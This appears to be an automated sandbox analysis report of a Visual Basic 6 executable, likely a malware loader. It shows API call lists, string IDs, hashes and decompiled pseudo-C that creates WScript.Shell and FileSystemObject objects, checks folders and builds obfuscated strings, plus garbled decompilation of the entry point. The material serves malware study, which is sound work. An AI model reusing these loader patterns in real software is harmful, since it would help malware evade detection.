      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB82
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
      • String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
      • API String ID: 3805544571-2284846736
      • Opcode ID: b3148a8c7af0992b69a4cef94eb25678f357a958fee12bf61983a4a2d946edf0
      • Instruction ID: 883565fa33546568cfc74b515b4cdddcb2f31a5c13bcaadf21b5faae7a44e9a2
      • Opcode Fuzzy Hash: b3148a8c7af0992b69a4cef94eb25678f357a958fee12bf61983a4a2d946edf0
      • Instruction Fuzzy Hash: A571FB71E00218AADB10EBA1CD46FDEB7B8AF05704F50817AF109B71E2DB785A45CF69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 60%
      			E00420284(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
      				char _v8;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				signed int _v40;
      				signed int _v44;
      				char _v48;
      				void* _v52;
      				char _v56;
      				void* _v60;
      				intOrPtr _v68;
      				char _v76;
      				char _v92;
      				intOrPtr _v100;
      				char _v108;
      				intOrPtr _v132;
      				intOrPtr _v140;
      				char* _v148;
      				char _v156;
      				signed int _v160;
      				signed int _v164;
      				intOrPtr* _v168;
      				signed int _v172;
      				intOrPtr* _v196;
      				signed int _v200;
      				signed int _v204;
      				signed int _v208;
      				signed int _t182;
      				signed int _t207;
      				char* _t208;
      				signed int _t219;
      				char* _t221;
      				signed int _t223;
      				signed int _t229;
      				void* _t231;
      				signed int _t234;
      				char* _t239;
      				void* _t246;
      				void* _t248;
      				void* _t250;
      				void* _t252;
      				void* _t254;
      				void* _t259;
      				void* _t261;
      				void* _t263;
      				void* _t273;
      				void* _t282;
      				void* _t284;
      				intOrPtr _t285;
      				void* _t286;
      
      				_t285 = _t284 - 0x18;
      				 *[fs:0x0] = _t285;
      				L00401540();
      				_v28 = _t285;
      				_v24 = 0x4013f0;
      				_v20 = 0;
      				_v16 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t282);
      				_v8 = 1;
      				_v8 = 2;
      				_v68 = 0x4fdf6b;
      				_v76 = 3;
      				_push( &_v76);
      				_push( &_v92);
      				L0040160C();
      				_push( &_v92);
      				_push( &_v108);
      				L004016BA();
      				_v148 = L"FOSTERET";
      				_v156 = 0x8008;
      				_push( &_v108);
      				_t182 =  &_v156;
      				_push(_t182);
      				L004016AE();
      				_v160 = _t182;
      				_push( &_v108);
      				_push( &_v92);
      				_push( &_v76);
      				_push(3);
      				L00401840();
      				_t286 = _t285 + 0x10;
      				if(_v160 != 0) {
      					_v8 = 3;
      					if( *0x4223c0 != 0) {
      						_v196 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v196 = 0x4223c0;
      					}
      					_v160 =  *_v196;
      					_t229 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v60);
      					asm("fclex");
      					_v164 = _t229;
      					if(_v164 >= 0) {
      						_v200 = _v200 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v160);
      						_push(_v164);
      						L004017C8();
      						_v200 = _t229;
      					}
      					_v168 = _v60;
      					_v132 = 0x80020004;
      					_v140 = 0xa;
      					_t231 = 0x10;
      					L00401540();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					L004016B4();
      					L0040183A();
      					_t234 =  *((intOrPtr*)( *_v168 + 0x13c))(_v168, _t231, 0x5e4c2e);
      					asm("fclex");
      					_v172 = _t234;
      					if(_v172 >= 0) {
      						_v204 = _v204 & 0x00000000;
      					} else {
      						_push(0x13c);
      						_push(0x4025b0);
      						_push(_v168);
      						_push(_v172);
      						L004017C8();
      						_v204 = _t234;
      					}
      					L00401846();
      					L004017C2();
      					_v8 = 4;
      					_v68 = 0x16;
      					_v76 = 2;
      					_push( &_v76);
      					_push( &_v92);
      					L00401606();
      					_v100 = 0xb8;
      					_v108 = 2;
      					_push( &_v108);
      					_push(0xa1);
      					_push( &_v92);
      					_t239 =  &_v56;
      					_push(_t239);
      					L00401858();
      					_push(_t239);
      					L004016A2();
      					L0040183A();
      					L00401846();
      					_push( &_v108);
      					_push( &_v92);
      					_push( &_v76);
      					_push(3);
      					L00401840();
      					_t286 = _t286 + 0x10;
      				}
      				_v8 = 6;
      				_push(0);
      				_push(9);
      				_push(1);
      				_push(3);
      				_push( &_v48);
      				_push(4);
      				_push(0x80);
      				L00401600();
      				_v8 = 7;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (0 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x27c30;
      				_v8 = 8;
      				_t246 = 1;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t246 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x94a0c;
      				_v8 = 9;
      				_t248 = 2;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t248 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2164a4;
      				_v8 = 0xa;
      				_t250 = 3;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t250 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5d9b94;
      				_v8 = 0xb;
      				_t252 = 4;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t252 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5a7363;
      				_v8 = 0xc;
      				_t254 = 5;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t254 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2787b7;
      				_v8 = 0xd;
      				_v68 =  *0x40146c;
      				_v76 = 4;
      				_push( &_v92);
      				_t207 =  &_v76;
      				_push(_t207);
      				L004017A4();
      				_v160 = _t207;
      				if(_v160 >= 0) {
      					_v208 = _v208 & 0x00000000;
      				} else {
      					_push(_v160);
      					L0040179E();
      					_v208 = _t207;
      				}
      				_t208 =  &_v92;
      				_push(_t208);
      				L0040178C();
      				_t273 = 6;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t273 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t208;
      				_push( &_v92);
      				_push( &_v76);
      				_push(2);
      				L00401840();
      				_v8 = 0xe;
      				_t259 = 7;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t259 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x37e4a9;
      				_v8 = 0xf;
      				_t261 = 8;
      				 *((intOrPtr*)( *(_v48 + 0xc) + (_t261 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x84c244;
      				_v8 = 0x10;
      				_t263 = 9;
      				_t219 =  *(_v48 + 0xc);
      				 *((intOrPtr*)(_t219 + (_t263 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x635cea;
      				_v8 = 0x11;
      				if((_t219 | 0xffffffff) != 0) {
      					_v8 = 0x12;
      					_v44 = 0x29c1aa;
      					_v8 = 0x13;
      					_t223 = _v44 ^ 0x0018dd5b;
      					_v44 = _t223;
      					_v8 = 0x14;
      					_push(0xffffffff);
      					L004016E4();
      					_v8 = 0x15;
      					_push(0x3ed0fd);
      					L004016B4();
      					L0040183A();
      					_push(_t223); // executed
      					L004015FA(); // executed
      					_v40 = _t223;
      					L00401846();
      				}
      				asm("wait");
      				_push(0x420748);
      				_t221 =  &_v48;
      				_push(_t221);
      				_push(0);
      				L0040173E();
      				L00401846();
      				return _t221;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 004202A2
      • #575.MSVBVM60(?,00000003), ref: 004202F1
      • #518.MSVBVM60(?,?,?,00000003), ref: 004202FE
      • __vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420322
      • __vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042033C
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,00401546), ref: 0042036D
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 004203CF
      • __vbaChkstk.MSVBVM60(00000000,?,00402590,00000014), ref: 00420400
      • __vbaStrI4.MSVBVM60(005E4C2E), ref: 00420416
      • __vbaStrMove.MSVBVM60(005E4C2E), ref: 00420420
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420461
      • __vbaFreeStr.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420478
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420480
      • #573.MSVBVM60(?,00000002), ref: 004204A2
      • __vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004204C6
      • #628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204CC
      • __vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204D6
      • __vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204DE
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004204F1
      • __vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 00420513
      • #564.MSVBVM60(00000004,?), ref: 004205E7
      • __vbaHresultCheck.MSVBVM60(00000000), ref: 00420601
      • __vbaI4Var.MSVBVM60(?), ref: 00420619
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 0042063A
      • __vbaOnError.MSVBVM60(000000FF), ref: 004206D0
      • __vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 004206E1
      • __vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 004206EB
      • #578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004206F1
      • __vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004206FC
      • __vbaAryDestruct.MSVBVM60(00000000,?,00420748), ref: 0042073A
      • __vbaFreeStr.MSVBVM60(00000000,?,00420748), ref: 00420742
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
      • String ID: FOSTERET
      • API String ID: 53557705-1574993597
      • Opcode ID: 74585fb6c561aa1d578bae654ca479468f3293eccefd2cf2175f35a5edf0b167
      • Instruction ID: 175c832a1b51420b5258a5431e878aaed3d7726f1090ab63ff026ef9ecbe60f6
      • Opcode Fuzzy Hash: 74585fb6c561aa1d578bae654ca479468f3293eccefd2cf2175f35a5edf0b167
      • Instruction Fuzzy Hash: FED108B5910218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF64
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 46%
      			E0041E66D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				void* _v24;
      				char _v28;
      				void* _v32;
      				void* _v36;
      				char _v52;
      				char* _v76;
      				intOrPtr _v84;
      				signed int _v108;
      				char _v116;
      				short _v120;
      				char* _t30;
      				char* _t33;
      				short _t34;
      				short _t35;
      				intOrPtr _t56;
      
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t56;
      				_push(0x68);
      				L00401540();
      				_v12 = _t56;
      				_v8 = 0x401310;
      				L004017B6();
      				_push(0);
      				_push(L"Scripting.FileSystemObject");
      				_push( &_v52); // executed
      				L004016F0(); // executed
      				_t30 =  &_v52;
      				_push(_t30);
      				L004016F6();
      				_push(_t30);
      				_push( &_v28);
      				L004016FC();
      				L00401828();
      				_v76 = L"Gulsoterne";
      				_v84 = 8;
      				_v108 = _v108 & 0x00000000;
      				_v116 = 0x8002;
      				_push(0x10);
      				L00401540();
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				_push(1);
      				_push(L"FolderExists");
      				_push(_v28);
      				_t33 =  &_v52;
      				_push(_t33); // executed
      				L004016EA(); // executed
      				_push(_t33);
      				_t34 =  &_v116;
      				_push(_t34);
      				L00401738();
      				_v120 = _t34;
      				L00401828();
      				_t35 = _v120;
      				if(_t35 != 0) {
      					_push(0x9ae);
      					L0040169C();
      					L0040183A();
      					_push(L"Propreste7");
      					_push(L"Desorganisationens");
      					L00401696();
      					L0040183A();
      				}
      				_push(0x41e796);
      				L00401846();
      				L004017C2();
      				L00401846();
      				L00401846();
      				return _t35;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E688
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041E6A0
      • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6B0
      • __vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6B9
      • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6C3
      • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6CB
      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E6EC
      • __vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041E708
      • __vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041E715
      • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041E721
      • #697.MSVBVM60(000009AE,?,00000000), ref: 0041E733
      • __vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041E73D
      • __vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E74C
      • __vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E756
      • __vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E778
      • __vbaFreeObj.MSVBVM60(0041E796,?,00000000), ref: 0041E780
      • __vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E788
      • __vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E790
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
      • String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
      • API String ID: 3773181626-3836659718
      • Opcode ID: 3723c0382a27267573c3fe806b053ee1ce9e4f9381be265413b1bdeb27e899bb
      • Instruction ID: 02a90346080b6d65794ca47e06d52b1e38554b1895dde0ef5aad230d2ce37d67
      • Opcode Fuzzy Hash: 3723c0382a27267573c3fe806b053ee1ce9e4f9381be265413b1bdeb27e899bb
      • Instruction Fuzzy Hash: 24313C71910218A7DB10EBA2CD86FEE7778BF01708F60453EB101770E1EBBD56458B58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 54%
      			E00420F4C(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a12) {
      				intOrPtr _v8;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				intOrPtr _v24;
      				long long* _v28;
      				char _v40;
      				char _v44;
      				char _v60;
      				char* _t18;
      				char* _t20;
      				char* _t22;
      				void* _t31;
      				long long* _t32;
      
      				_t32 = _t31 - 0x18;
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t32;
      				_t18 = 0x2c;
      				L00401540();
      				_v28 = _t32;
      				_v24 = 0x4014e0;
      				_v20 = 0;
      				_v16 = 0;
      				_v8 = 1;
      				_t22 =  &_v40;
      				L004017B6();
      				_v8 = 2;
      				_push(_t22);
      				_push(_t22);
      				 *_t32 =  *0x401520;
      				L004015D6();
      				L004015DC();
      				asm("fcomp qword [0x401518]");
      				asm("fnstsw ax");
      				asm("sahf");
      				if(__eflags < 0) {
      					_v8 = 3;
      					_push(0xffffffff);
      					L004016E4();
      					_v8 = 4;
      					_push(0);
      					_push(L"WScript.Shell");
      					_push( &_v60); // executed
      					L004016F0(); // executed
      					_t20 =  &_v60;
      					_push(_t20);
      					L004016F6();
      					_push(_t20);
      					_t18 =  &_v44;
      					_push(_t18);
      					L004016FC();
      					L00401828();
      				}
      				asm("wait");
      				_push(0x421023);
      				L00401846();
      				L004017C2();
      				return _t18;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420F68
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420F95
      • #582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FAC
      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FB1
      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420FCA
      • #716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FE1
      • __vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FEA
      • __vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FF4
      • __vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FFC
      • __vbaFreeStr.MSVBVM60(00421023,?,?,?,?,?,?,00401546), ref: 00421015
      • __vbaFreeObj.MSVBVM60(00421023,?,?,?,?,?,?,00401546), ref: 0042101D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$#582#716AddrefChkstkCopyError
      • String ID: WScript.Shell
      • API String ID: 2682307056-813827646
      • Opcode ID: 9ae9595ff67f969ff0b0e3e10281badd87c183c121a1a7f2c62277ae3b0ce00d
      • Instruction ID: eb16c35e6acd40f0e13e5f4b480fa3bd2579fd0ca9ac4f3a52b02e3c4c7057dd
      • Opcode Fuzzy Hash: 9ae9595ff67f969ff0b0e3e10281badd87c183c121a1a7f2c62277ae3b0ce00d
      • Instruction Fuzzy Hash: 06115EB1900208BBCB10EFA2DD46BDEBBB8EB04708F50456EF101771E1DB7D5A448B99
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 54%
      			E00421036(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v24;
      				intOrPtr _v28;
      				intOrPtr _v32;
      				char _v36;
      				intOrPtr _v44;
      				intOrPtr _v52;
      				intOrPtr _v60;
      				intOrPtr _v68;
      				char _v72;
      				signed int _v76;
      				signed int _v84;
      				signed int _v88;
      				signed int _t50;
      				signed int _t62;
      				void* _t67;
      				void* _t74;
      				intOrPtr _t76;
      
      				_t67 = __edx;
      				 *[fs:0x0] = _t76;
      				L00401540();
      				_v12 = _t76;
      				_v8 = 0x401528;
      				L004016FC();
      				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401546, __ecx, __ecx, _t74);
      				asm("fclex");
      				_v76 = _t50;
      				if(_v76 >= 0) {
      					_v84 = _v84 & 0x00000000;
      				} else {
      					_push(0x58);
      					_push(0x402314);
      					_push(_a4);
      					_push(_v76);
      					L004017C8();
      					_v84 = _t50;
      				}
      				_v32 = _v72;
      				L004016FC();
      				L004015D0();
      				_v28 = E00421317( &_v36);
      				L004017C2();
      				_v32 = E00421317(_v28) + 0x2b0;
      				E004211B3(_t67, _v32, _a8);
      				_v60 = 0x80020004;
      				_v68 = 0xa;
      				_v44 = 0x80020004;
      				_v52 = 0xa;
      				L00401540();
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				L00401540();
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				asm("movsd");
      				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
      				asm("fclex");
      				_v76 = _t62;
      				if(_v76 >= 0) {
      					_v88 = _v88 & 0x00000000;
      				} else {
      					_push(0x2b0);
      					_push(0x402314);
      					_push(_a4);
      					_push(_v76);
      					L004017C8();
      					_v88 = _t62;
      				}
      				_push(0x421179);
      				L004017C2();
      				return _t62;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00421051
      • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042106A
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402314,00000058), ref: 00421096
      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004210B1
      • #644.MSVBVM60(?,?,?), ref: 004210BA
      • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004210CB
      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042110A
      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042111B
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402314,000002B0), ref: 00421152
      • __vbaFreeObj.MSVBVM60(00421179), ref: 00421173
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
      • String ID:
      • API String ID: 1032928638-0
      • Opcode ID: 9e3e3bcaed555255f90cbfb79cbad12f44f598c8d465e8b6702613a5947fb933
      • Instruction ID: cfd7f10f4326765af16ed6dd4e388d4e9dd2d1b1e363c786afdfca8b2c8dd650
      • Opcode Fuzzy Hash: 9e3e3bcaed555255f90cbfb79cbad12f44f598c8d465e8b6702613a5947fb933
      • Instruction Fuzzy Hash: EE414771900258AFDF01DF91CC46BDEBBB5FF09344F20442AFA01BB1A1D7B999468B98
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 84%
      			_entry_(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, char _a1, void* _a4, void* _a12245915) {
      				void* _v8;
      				void* _v18;
      				void* _v30;
      				void* _v34;
      				void* _v38;
      				void* _v40;
      				void* _v44;
      				void* _v48;
      				void* _v52;
      				void* _v64;
      				void* _v76;
      				void* _v84;
      				void* _v88;
      				void* _v92;
      				void* _v96;
      				void* _v98;
      				void* _v100;
      				void* _v104;
      				void* _v108;
      				void* _v112;
      				void* _v128;
      				void* _v132;
      				void* _v136;
      				void* _v140;
      				void* _v144;
      				void* _v148;
      				void* _v152;
      				void* _v156;
      				void* _v160;
      				void* _v164;
      				void* _v166;
      				void* _v168;
      				void* _v176;
      				void* _v184;
      				void* _v192;
      				void* _v200;
      				void* _v206;
      				void* _v216;
      				void* _v222;
      				void* _v224;
      				void* _v230;
      				void* _v232;
      				void* _v238;
      				void* _v240;
      				void* _v248;
      				void* _v264;
      				void* _v272;
      				void* _v280;
      				void* _v294;
      				void* _v302;
      				void* _v332;
      				void* _v336;
      				void* _v340;
      				void* _v344;
      				void* _v348;
      				void* _v352;
      				void* _v356;
      				void* _v360;
      				void* _v364;
      				void* _v368;
      				void* _v376;
      				void* _v380;
      				void* _v384;
      				void* _v388;
      				void* _v392;
      				void* _v402;
      				void* _v404;
      				void* _v408;
      				void* _v412;
      				void* _v416;
      				void* _v420;
      				void* _v424;
      				void* _v428;
      				void* _v432;
      				void* _v436;
      				void* _v440;
      				void* _v444;
      				void* _v448;
      				void* _v452;
      				void* _v456;
      				void* _v460;
      				void* _v464;
      				void* _v468;
      				void* _v472;
      				void* _v476;
      				void* _v480;
      				void* _v484;
      				void* _v488;
      				void* _v492;
      				void* _v496;
      				void* _v500;
      				void* _v504;
      				char _t794;
      
      				_push("VB5!6&*"); // executed
      				L00401882(); // executed
      				 *__eax =  *__eax + __eax;
      				 *__eax =  *__eax + __eax;
      				 *__eax =  *__eax + __eax;
      				 *__eax =  *__eax ^ __eax;
      				 *__eax =  *__eax + __eax;
      				_t794 = __eax + 1;
      				 *_t794 =  *_t794 + _t794;
      				 *_t794 =  *_t794 + _t794;
      				 *_t794 =  *_t794 + _t794;
      				 *0x88474d5d =  *0x88474d5d + __edx;
      				asm("repne dec edx");
      				 *0x6cc034c0 = _t794;
      				do {
      					asm("insb");
      				} while (__eflags > 0);
      				_push(cs);
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __eax;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				__esi = __esi - 1;
      				__edx = __edx + 1;
      				__edi = __edi - 1;
      				__esp = __esp - 1;
      				__esp = __esp + 1;
      				__ebp =  &_a1;
      				__esi = __esi - 1;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				__esp = __esp - 1;
      				 *__eax =  *__eax ^ __eax;
      				 *((intOrPtr*)(__edx - 0x7bdfc270)) =  *((intOrPtr*)(__edx - 0x7bdfc270)) + __bh;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				 *__eax =  *__eax + __al;
      				__eax = __ebp;
      				 *__eax =  *__eax + __al;
      				 *__ebx =  *__ebx + __dl;
      				 *__eax =  *__eax + __al;
      				 *__edi =  *__edi + __al;
      				 *((intOrPtr*)(__edx + 0x79)) =  *((intOrPtr*)(__edx + 0x79)) + __ah;
      				asm("a16 jb 0x7d");
      				asm("outsb");
      				 *0x41001001 =  *0x41001001 + __cl;
      				__eflags =  *0x41001001;
      				asm("o16 jae 0x6e");
      				if( *0x41001001 >= 0) {
      					L8:
      					__al =  *0x74d8;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					 *__eax =  *__eax + __al;
      					__ah = __ah + __cl;
      					asm("sbb [eax], eax");
      					_push(__esi);
      					__edx = __edx + 1;
      					__eax = __eax ^ 0x2a263621;
      					__eflags = __eax;
      					goto L9;
      				} else {
      					__ebp =  *(__ebx + 0x65 + __esi * 2) * 0x3772656e;
      					 *__ecx =  *__ecx + __bl;
      					 *__eax =  *__eax + __eax;
      					__edx = __edx + 1;
      					 *((intOrPtr*)(__eax + __edx)) =  *((intOrPtr*)(__eax + __edx)) + __ah;
      					_t10 = __ecx + 0x66;
      					 *_t10 =  *(__ecx + 0x66) + __al;
      					__eflags =  *_t10;
      					if(__eflags >= 0) {
      						L9:
      						__al = __al -  *[es:eax];
      						__eflags = __al;
      					} else {
      						if(__eflags < 0) {
      							__ebp =  *(__ebx + 0x65 + __esi * 2) * 0x3772656e;
      							 *0x1567 =  *0x1567 + __dh;
      							asm("rcl dword [esi], 0x0");
      							 *__ecx =  *__ecx + __ah;
      							_push(cs);
      							 *__eax =  *__eax + __al;
      							 *((intOrPtr*)(__eax + __eax + 0x46)) =  *((intOrPtr*)(__eax + __eax + 0x46)) + __al;
      							__edi = __edi + __edi;
      							__al = __al;
      							 *__eax =  *__eax + __al;
      							 *__eax =  *__eax + __al;
      							 *((intOrPtr*)(__ecx + __esi + 0x10040)) =  *((intOrPtr*)(__ecx + __esi + 0x10040)) + __ah;
      							__al = __al +  *__eax;
